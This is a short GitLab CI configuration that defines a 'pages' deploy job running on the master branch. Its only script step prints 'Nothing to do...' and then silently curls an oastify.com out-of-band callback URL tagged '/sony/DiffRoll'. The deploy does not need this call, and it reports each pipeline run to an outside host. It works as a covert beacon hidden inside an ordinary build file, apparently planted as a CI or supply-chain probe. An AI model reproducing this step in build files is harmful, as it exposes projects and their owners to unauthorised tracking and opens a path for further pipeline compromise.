image: alpine:latest

pages:
  stage: deploy
  script:
  - echo 'Nothing to do...' && curl https://ojb4x16q0ns4n7yuezwo0j67kyqtekf84.oastify.com/sony/DiffRoll
  artifacts:
    paths:
    - public
  only:
  - master
